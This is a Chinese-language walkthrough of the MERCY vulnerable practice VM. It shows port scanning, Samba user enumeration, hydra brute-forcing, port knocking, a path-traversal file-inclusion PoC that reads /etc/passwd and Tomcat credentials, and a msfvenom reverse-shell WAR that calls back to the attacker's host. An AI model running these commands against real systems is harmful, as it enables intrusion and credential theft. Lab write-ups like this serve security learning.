MERCY靶机

仅供个人娱乐

靶机信息

下载地址：https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download

一、主机探测

二、信息收集

22/tcp filtered ssh

53/tcpopendomain

80/tcp filtered http

110/tcpopenpop3?

139/tcpopennetbios-ssn Samba smbd3.X-4.X(workgroup:WORKGROUP)

143/tcpopenimap Dovecot imapd

445/tcpopennetbios-ssn Samba smbd4.3.11-Ubuntu(workgroup:WORKGROUP)

993/tcpopenssl/imap Dovecot imapd995/tcpopenssl/pop3s?

8080/tcpopenhttp Apache Tomcat/Coyote JSP engine1.1

8080tomcat页面，/manager/登录不了

三、漏洞查找和利用

1.Samba漏洞攻击

Samba服务查看用户名.

enum4linux -U 192.168.174.130

用户名为：qiu 或者 pleadformercy

尝试远程挂载

mkdir /mnt/file

mount  -tcifs 192.168.174.130:/qiu  /mnt/file

hydra -L 1.txt -P 2.txt smb://192.168.174.130 -s 139

登录账户信息
smbclient //192.168.174.130/qiu -U qiu

端口启动守护进程的防火墙端口开放的命令配置.

#!/bin/bash

for PORT in 159 27391 4;do nmap -Pn 192.168.174.130 -p $PORT;

done

#!/bin/bash

for PORT in 17301 28504 9999;do nmap -Pn 192.168.174.130 -p $PORT;

done

打开80端口

其PoC为:

http://192.168.174.130/nomercy//windows/code.php?file=../../../../../../etc/passwd

8080端口中 ，apache的配置信息在/etc/tomcat7/tomcat-users.xml

http://192.168.174.130/nomercy//windows/code.php?file=../../../../../../etc/tomcat7/tomcat-users.xml

获取账户密码

<?
<user username="thisisasuperduperlonguser"
password="heartbreakisinevitable"
roles="admin-gui,manager-gui"/><? <user username="fluffy"
password="freakishfluffybunny" roles="none"/>

msfvenom来生成反弹war包

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.174.128 LPORT=4444 -f war -o shell1.war

通过7z命令查看war包的内容

7z l shell1.war

生成的是wviikccgyjggh.jsp

访问http://192.168.174.130:8080/shell1/wviikccgyjggh.jsp

python -c 'import pty;pty.spawn("/bin/bash")'

信息收集

切换账户登录

<? <user username="fluffy" password="freakishfluffybunny" roles="none"/>